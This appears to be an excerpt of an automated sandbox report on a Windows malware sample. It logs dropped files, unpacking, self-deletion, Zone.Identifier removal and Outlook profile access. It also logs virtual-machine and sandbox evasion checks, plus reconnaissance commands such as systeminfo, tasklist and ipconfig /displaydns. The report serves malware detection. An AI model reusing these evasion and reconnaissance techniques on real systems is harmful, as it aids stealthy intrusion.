      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\ROUTE.EXESection loaded: iphlpapi.dll
      Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\ROUTE.EXESection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\ROUTE.EXESection loaded: dnsapi.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
      Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
      Source: C:\Users\user\Desktop\bCnarg2O62.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: bCnarg2O62.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

      Data Obfuscation

      barindex
      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Desktop\bCnarg2O62.exeUnpacked PE file: 0.2.bCnarg2O62.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.siy:R;.fitecos:R;.darulet:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\derhsweUnpacked PE file: 5.2.derhswe.400000.0.unpack .text:ER;.rdata:R;.data:W;.siy:R;.fitecos:R;.darulet:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\derhsweUnpacked PE file: 6.2.derhswe.400000.0.unpack .text:ER;.rdata:R;.data:W;.siy:R;.fitecos:R;.darulet:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeUnpacked PE file: 7.2.1D0F.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xexolu:R;.naxurew:R;.havi:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\jfrhsweUnpacked PE file: 8.2.jfrhswe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xexolu:R;.naxurew:R;.havi:W;.rsrc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Local\Temp\9245.exeCode function: 10_2_00007FF7327A78EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,10_2_00007FF7327A78EC
      Source: bCnarg2O62.exeStatic PE information: section name: .siy
      Source: bCnarg2O62.exeStatic PE information: section name: .fitecos
      Source: bCnarg2O62.exeStatic PE information: section name: .darulet
      Source: 1D0F.exe.1.drStatic PE information: section name: .xexolu
      Source: 1D0F.exe.1.drStatic PE information: section name: .naxurew
      Source: 1D0F.exe.1.drStatic PE information: section name: .havi
      Source: jfrhswe.1.drStatic PE information: section name: .xexolu
      Source: jfrhswe.1.drStatic PE information: section name: .naxurew
      Source: jfrhswe.1.drStatic PE information: section name: .havi
      Source: derhswe.1.drStatic PE information: section name: .siy
      Source: derhswe.1.drStatic PE information: section name: .fitecos
      Source: derhswe.1.drStatic PE information: section name: .darulet
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_004014D9 pushad ; ret 0_2_004014E9
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_004031DB push eax; ret 0_2_004032AB
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_00521540 pushad ; ret 0_2_00521550
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_005C32ED push esp; ret 0_2_005C32EF
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_005C1690 push B63524ADh; retn 001Fh0_2_005C16C7
      Source: C:\Users\user\Desktop\bCnarg2O62.exeCode function: 0_2_005C218D pushfd ; iretd 0_2_005C218E
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 5_2_004014D9 pushad ; ret 5_2_004014E9
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 5_2_004031DB push eax; ret 5_2_004032AB
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 5_2_004A1540 pushad ; ret 5_2_004A1550
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 5_2_005225E5 push esp; ret 5_2_005225E7
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 5_2_00521485 pushfd ; iretd 5_2_00521486
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 5_2_00520988 push B63524ADh; retn 001Fh5_2_005209BF
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_004014D9 pushad ; ret 6_2_004014E9
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_004031DB push eax; ret 6_2_004032AB
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_00521540 pushad ; ret 6_2_00521550
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_00754355 pushfd ; iretd 6_2_00754356
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_00753858 push B63524ADh; retn 001Fh6_2_0075388F
      Source: C:\Users\user\AppData\Roaming\derhsweCode function: 6_2_007554B5 push esp; ret 6_2_007554B7
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_00402842 pushad ; retf F6A4h7_2_004029D1
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_00401065 pushfd ; retf 7_2_0040106A
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_00402805 push 21CACAEFh; iretd 7_2_0040280A
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_00402511 push ebp; iretd 7_2_00402523
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_00403325 push eax; ret 7_2_004033F3
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_00403433 pushad ; ret 7_2_004035AB
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_00401182 push esp; retf 7_2_0040118E
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_00402A9D pushad ; retf 7_2_00402AAB
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_004012B7 push cs; iretd 7_2_004012B8
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_005F2578 push ebp; iretd 7_2_005F258A
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_005F286C push 21CACAEFh; iretd 7_2_005F2871
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_005F131E push cs; iretd 7_2_005F131F
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_005F2B04 pushad ; retf 7_2_005F2B12

      Persistence and Installation Behavior

      barindex
      Uses ipconfig to lookup or modify the Windows network settings
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\1D0F.exeJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jfrhsweJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\derhsweJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9245.exeJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jfrhsweJump to dropped file
      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\derhsweJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Deletes itself after installation
      Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\bcnarg2o62.exeJump to behavior
      Hides that the sample has been downloaded from the Internet (zone.identifier)
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\derhswe:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\jfrhswe:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\9245.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Checks if the current machine is a virtual machine (disk enumeration)
      Source: C:\Users\user\Desktop\bCnarg2O62.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\bCnarg2O62.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\bCnarg2O62.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\bCnarg2O62.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\bCnarg2O62.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\bCnarg2O62.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\derhsweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\jfrhsweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\jfrhsweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\jfrhsweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\jfrhsweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\jfrhsweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\jfrhsweKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Found evasive API chain (may stop execution after checking mutex)
      Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_14-890
      Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
      Source: C:\Users\user\AppData\Local\Temp\9245.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
      Source: C:\Users\user\AppData\Local\Temp\9245.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, ProductName, ServiceName, NetConnectionID FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
      Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
      Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
      Source: C:\Users\user\AppData\Local\Temp\9245.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_StartupCommand
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Location, Command FROM Win32_StartupCommand
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\bCnarg2O62.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\Desktop\bCnarg2O62.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Roaming\derhsweAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Roaming\derhsweAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Roaming\jfrhsweAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Roaming\jfrhsweAPI/Special instruction interceptor: Address: 7FFE2220D584
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: bCnarg2O62.exe, 00000000.00000002.1799228809.000000000059E000.00000004.00000020.00020000.00000000.sdmp, jfrhswe, 00000008.00000002.2520101512.000000000072E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
      Source: derhswe, 00000006.00000002.2106549863.0000000000738000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKKW
      Source: 1D0F.exe, 00000007.00000002.2263890739.000000000074E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKNL
      Source: C:\Users\user\AppData\Local\Temp\1D0F.exeCode function: 7_2_00401E65 rdtsc 7_2_00401E65
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_00581016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,14_2_00581016
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 459Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 738Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 513Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 412Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 376Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 888Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 864Jump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 2630Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2197Jump to behavior
      Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 3699
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3620
